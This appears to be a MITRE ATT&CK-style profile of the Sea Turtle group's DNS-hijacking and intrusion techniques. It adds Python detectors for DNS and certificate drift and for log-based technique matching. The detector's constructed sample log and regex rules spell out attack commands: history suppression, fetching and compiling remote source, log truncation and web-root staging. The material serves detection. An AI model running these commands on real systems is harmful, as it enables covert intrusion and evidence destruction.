Sea Turtle

Sea Turtle is a Türkiye-linked threat actor active since at least 2017 that performs espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars that manage ccTLDs and for complex DNS-based intrusions in which the threat actor compromised DNS providers to hijack DNS resolution for the ultimate victims, enabling Sea Turtle to spoof login portals and other applications for credential collection.[1][2][3][4]

ID: G1041
Associated Groups: Teal Kurma, Marbled Dust, Cosmic Wolf, SILICON
Contributors: Inna Danilevich, U.S. Bank; Joe Gumke, U.S. Bank
Version: 1.0
Created: 20 November 2024
Last Modified: 28 March 2025

Associated Group Descriptions

Name Description
Teal Kurma [3][4]
Marbled Dust [3][4]
Cosmic Wolf [3][4]
SILICON [5][4]

Techniques Used

Domain ID Name Use
Enterprise T1583 Acquire Infrastructure

Sea Turtle accessed victim networks from VPN service provider networks.[4]

Enterprise T1583 .001 Acquire Infrastructure: Domains

Sea Turtle registered domains for authoritative name servers used in DNS hijacking activity and for command and control servers.[2][4]

Enterprise T1583 .002 Acquire Infrastructure: DNS Server

Sea Turtle built adversary-in-the-middle DNS servers to impersonate legitimate services that were later used to capture credentials.[2][1]

Enterprise T1583 .003 Acquire Infrastructure: Virtual Private Server

Sea Turtle created adversary-in-the-middle servers to impersonate legitimate services and enable credential capture.[1]

Enterprise T1557 Adversary-in-the-Middle

Sea Turtle modified DNS records at service providers to redirect traffic from legitimate resources to Sea Turtle-controlled servers to enable adversary-in-the-middle attacks for credential capture.[1][2]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Sea Turtle connected over TCP using HTTP to establish command and control channels.[4]

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

Sea Turtle used the tar utility to create a local archive of email data on a victim system.[4]

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

Sea Turtle used shell scripts for post-exploitation execution in victim environments.[3][4]

Enterprise T1584 .002 Compromise Infrastructure: DNS Server

Sea Turtle modified Name Server (NS) records to point to Sea Turtle-controlled DNS servers, which then provided the responses for all DNS lookups in the hijacked zone.[1][2]

Enterprise T1213 Data from Information Repositories

Sea Turtle used the tool Adminer to remotely log on to the MySQL service of victim machines.[4]

Enterprise T1074 .002 Data Staged: Remote Data Staging

Sea Turtle staged collected email archives in the public web directory of a website that was accessible from the internet.[4]

Enterprise T1114 .001 Email Collection: Local Email Collection

Sea Turtle collected email archives from victim environments.[4]

Enterprise T1190 Exploit Public-Facing Application

Sea Turtle gained access to victim environments by exploiting multiple known vulnerabilities over several campaigns.[1][3]

Enterprise T1203 Exploitation for Client Execution

Sea Turtle has used exploits for vulnerabilities such as CVE-2021-44228, CVE-2021-21974, and CVE-2022-0847 to achieve client code execution.[3]

Enterprise T1133 External Remote Services

Sea Turtle has used external-facing SSH to achieve initial access to the IT environments of victim organizations.[4]

Enterprise T1564 .011 Hide Artifacts: Ignore Process Interrupts

Sea Turtle executed SnappyTCP using the nohup utility, which keeps the malware running after the shell or terminal that launched it exits.[4]

Enterprise T1562 .003 Impair Defenses: Impair Command History Logging

Sea Turtle unset the Bash and MySQL history files on victim systems.[4]

Enterprise T1070 .002 Indicator Removal: Clear Linux or Mac System Logs

Sea Turtle overwrote Linux system logs and unset the Bash history file (effectively disabling command logging) during intrusions.[4]

Enterprise T1027 .004 Obfuscated Files or Information: Compile After Delivery

Sea Turtle downloaded source code files from remote addresses and then compiled them locally with GCC in victim environments.[4]

Enterprise T1588 .002 Obtain Capabilities: Tool

Sea Turtle has used tools such as Adminer during intrusions.[4]

Enterprise T1588 .004 Obtain Capabilities: Digital Certificates

Sea Turtle created new certificates using a technique called "certificate impersonation," in which Sea Turtle obtained a certificate authority-signed X.509 certificate for the same domain from a different provider, imitating the certificate already used by the targeted organization.[1][2]

Enterprise T1566 Phishing

Sea Turtle used spear phishing to gain initial access to victims.[1]

Enterprise T1505 .003 Server Software Component: Web Shell

Sea Turtle deployed the SnappyTCP web shell during intrusion operations.[3][4]

Enterprise T1608 .003 Stage Capabilities: Install Digital Certificate

Sea Turtle captured legitimate SSL certificates from victim organizations and installed these on Sea Turtle-controlled infrastructure to enable subsequent adversary-in-the-middle operations.[1]

Enterprise T1199 Trusted Relationship

Sea Turtle targeted third-party entities in trusted relationships with primary targets to ultimately achieve access at primary targets. Entities targeted included DNS registrars, telecommunication companies, and internet service providers.[1]

Enterprise T1078 Valid Accounts

Sea Turtle used compromised credentials to maintain long-term access to victim environments.[1]

Enterprise T1078 .003 Valid Accounts: Local Accounts

Sea Turtle compromised cPanel accounts in victim environments.[4]
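The delegation hijack, adversary-in-the-middle redirection, certificate impersonation and stolen-certificate reuse in the T1584.002, T1557, T1588.004 and T1608.003 rows above are all visible from outside the organization, which makes them good candidates for a baseline-drift monitor. The Python below is an added example written for this page, not code from MITRE or from any of the cited reports: it compares an externally observed snapshot of a host against a trusted baseline and maps each kind of drift to the technique it indicates. The domain, name servers, CIDR ranges, issuer names and fingerprints are constructed placeholders; a real deployment would fill `Snapshot` from live queries to the parent zone, a direct query to the baseline name servers, a TLS handshake, and a certificate-transparency feed.

```python
# Added example for this page (not MITRE's or a vendor's code): baseline-drift
# checks for the DNS-hijack and certificate-impersonation pattern attributed
# to Sea Turtle. All domains, name servers, IP ranges, issuers and
# fingerprints below are CONSTRUCTED placeholders, not real indicators.
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Snapshot:
    """What an external vantage point currently observes for one host name."""
    domain: str
    parent_ns: frozenset      # NS delegation as answered by the parent (TLD) zone
    legit_ns_view: frozenset  # NS set answered when the baseline servers are queried directly
    a_records: frozenset      # addresses the host name currently resolves to
    cert_issuer: str          # issuer CN of the TLS leaf certificate served on port 443
    cert_sha256: str          # SHA-256 fingerprint of that leaf certificate


@dataclass(frozen=True)
class Baseline:
    """Trusted reference state recorded while the zone was known to be clean."""
    ns: frozenset           # the organisation's real authoritative servers
    networks: tuple         # CIDR ranges the organisation actually hosts in
    issuers: frozenset      # CAs the organisation has ever obtained certificates from
    cert_sha256: frozenset  # fingerprints of certificates it legitimately holds


def check_snapshot(base: Baseline, snap: Snapshot) -> list:
    """Return a list of (rule, detail) alerts; an empty list means no drift."""
    alerts = []
    # T1584.002: the registrar/registry-level delegation no longer matches.
    if snap.parent_ns != base.ns:
        alerts.append(("NS_DELEGATION_CHANGED", sorted(snap.parent_ns)))
    # The parent delegates elsewhere while the real servers still claim the
    # zone: that is a change at the registrar, not a planned migration.
    if snap.parent_ns != snap.legit_ns_view:
        alerts.append(("NS_PARENT_VS_LEGIT_MISMATCH", sorted(snap.legit_ns_view)))
    # T1557: the name now resolves to hosts outside the organisation's ranges.
    outside = sorted(ip for ip in snap.a_records
                     if not any(ip_address(ip) in ip_network(n) for n in base.networks))
    if outside:
        alerts.append(("A_RECORD_OUTSIDE_ORG", outside))
    # T1588.004: a valid certificate for the same name from an unexpected CA.
    if snap.cert_issuer not in base.issuers:
        alerts.append(("UNEXPECTED_CA", snap.cert_issuer))
    # T1608.003: one of the organisation's own certificates served by a host
    # it does not control (captured certificate reused for AitM).
    if outside and snap.cert_sha256 in base.cert_sha256:
        alerts.append(("LEGIT_CERT_ON_FOREIGN_HOST", snap.cert_sha256[:16]))
    return alerts


# Constructed sample data (placeholder names and reserved documentation ranges).
BASE = Baseline(
    ns=frozenset({"ns1.example-org.test", "ns2.example-org.test"}),
    networks=("203.0.113.0/24",),
    issuers=frozenset({"Example Trusted CA"}),
    cert_sha256=frozenset({"a1" * 32}),
)
CLEAN = Snapshot("mail.example-org.test", BASE.ns, BASE.ns,
                 frozenset({"203.0.113.25"}), "Example Trusted CA", "a1" * 32)
# Delegation moved to attacker servers, name resolves elsewhere, new cert from another CA.
HIJACKED = Snapshot("mail.example-org.test", frozenset({"ns1.attacker-ns.test"}), BASE.ns,
                    frozenset({"198.51.100.7"}), "Other Free CA", "b2" * 32)
# Same hijack, but the organisation's own certificate is served from the foreign host.
STOLEN_CERT = Snapshot("mail.example-org.test", frozenset({"ns1.attacker-ns.test"}), BASE.ns,
                       frozenset({"198.51.100.7"}), "Example Trusted CA", "a1" * 32)

if __name__ == "__main__":
    for name, snap in (("clean", CLEAN), ("hijacked", HIJACKED), ("stolen_cert", STOLEN_CERT)):
        print(name, check_snapshot(BASE, snap))
```

Two of these checks are worth running on a schedule even without a full baseline: querying the parent zone for the delegation and querying the organisation's own name servers directly, then comparing the two, catches a registrar-level NS change regardless of what the attacker's servers answer.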

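The Linux tradecraft in the T1562.003, T1070.002, T1564.011, T1027.004, T1560.001 and T1074.002 rows (history logging disabled, logs overwritten, nohup to survive the shell exiting, download-then-compile with GCC, tar archives staged under a web root) all leaves traces in recorded command lines. The Python below is an added example, not code from the MITRE page or from any referenced report: it scans a constructed process-audit log in a hypothetical `ts host= uid= cmd=` line format, maps each single-line hit to its technique ID, and applies a two-step rule for a `.c` file that is fetched and later compiled in the same session. Every host name, IP address, path and command in the sample is constructed.

```python
# Added example for this page (not MITRE's or a vendor's code): map recorded
# command lines to the Linux techniques attributed to Sea Turtle. The log
# format (ts host= uid= cmd=) is hypothetical and the sample is CONSTRUCTED.
import re
from collections import defaultdict

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+uid=(?P<uid>\d+)\s+cmd=(?P<cmd>.*)$')

# Single-line rules: (technique ID, pattern over the command string).
RULES = [
    # Bash/MySQL history disabled or cleared.
    ("T1562.003", re.compile(
        r'(?:\bunset\s+(?:HISTFILE|MYSQL_HISTFILE)\b'
        r'|\b(?:HISTFILE|MYSQL_HISTFILE)=/dev/null|\bhistory\s+-c\b)')),
    # A process launched under nohup so it survives the terminal closing.
    ("T1564.011", re.compile(r'(?:^|[;&|]\s*)nohup\s+')),
    # tar invoked in create mode (a "c" among the mode letters).
    ("T1560.001", re.compile(r'\btar\s+-?[a-zA-Z]*c[a-zA-Z]*f?\s')),
    # An archive written under a web-served directory.
    ("T1074.002", re.compile(r'(?:/var/www|/public_html)/\S+\.(?:tar|tgz|tar\.gz|zip)\b')),
    # System log files truncated, overwritten or shredded.
    ("T1070.002", re.compile(r'(?:>\s*/var/log/\S+|\b(?:truncate|shred)\b.*\s/var/log/\S+)')),
]

# Two-step rule for compile-after-delivery: remember .c files fetched with
# curl/wget, then flag a gcc invocation that compiles one of them.
DOWNLOAD_RE = re.compile(r'\b(?:curl|wget)\b.*?(\S+\.c)\b')
COMPILE_RE = re.compile(r'\bgcc\b.*?(\S+\.c)\b')


def scan(log_text):
    """Return a list of (ts, (host, uid), technique_id, cmd) hits in log order."""
    hits = []
    fetched = defaultdict(set)  # (host, uid) -> basenames of downloaded .c files
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a command record in the expected format
        key = (m['host'], m['uid'])
        cmd = m['cmd']
        for technique, pattern in RULES:
            if pattern.search(cmd):
                hits.append((m['ts'], key, technique, cmd))
        d = DOWNLOAD_RE.search(cmd)
        if d:
            fetched[key].add(d.group(1).rsplit('/', 1)[-1])
        c = COMPILE_RE.search(cmd)
        if c and c.group(1).rsplit('/', 1)[-1] in fetched[key]:
            hits.append((m['ts'], key, "T1027.004", cmd))
    return hits


def summarize(hits):
    """Group technique IDs per (host, uid) so an analyst sees the whole chain."""
    by_session = defaultdict(set)
    for _, key, technique, _ in hits:
        by_session[key].add(technique)
    return dict(by_session)


# Constructed sample log: one unprivileged session showing the full chain,
# plus a root backup job that only trips the low-severity tar rule.
SAMPLE_LOG = """\
2024-11-20T10:15:02Z host=web01 uid=1001 cmd=ls -la /home/app
2024-11-20T10:15:09Z host=web01 uid=1001 cmd=unset HISTFILE MYSQL_HISTFILE
2024-11-20T10:16:30Z host=web01 uid=1001 cmd=curl -sO http://198.51.100.7/src/snappy.c
2024-11-20T10:16:41Z host=web01 uid=1001 cmd=gcc -o /tmp/.s snappy.c
2024-11-20T10:17:05Z host=web01 uid=1001 cmd=nohup /tmp/.s >/dev/null 2>&1 &
2024-11-20T10:20:12Z host=web01 uid=1001 cmd=tar -czf /var/www/html/m.tgz /home/mail/Maildir
2024-11-20T10:25:00Z host=web01 uid=1001 cmd=cat /dev/null > /var/log/wtmp
2024-11-20T11:00:00Z host=web01 uid=0 cmd=tar -czf /root/backup/etc.tgz /etc
"""

if __name__ == "__main__":
    for ts, key, technique, cmd in scan(SAMPLE_LOG):
        print(ts, key, technique, cmd)
    print(summarize(scan(SAMPLE_LOG)))
```

On its own, a tar create or a single nohup is routine administration; the value is in the per-session summary, where history suppression, compile-after-delivery, a web-root archive and a log truncation from the same host and user in a few minutes together describe the behaviour the rows above document.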
Software

References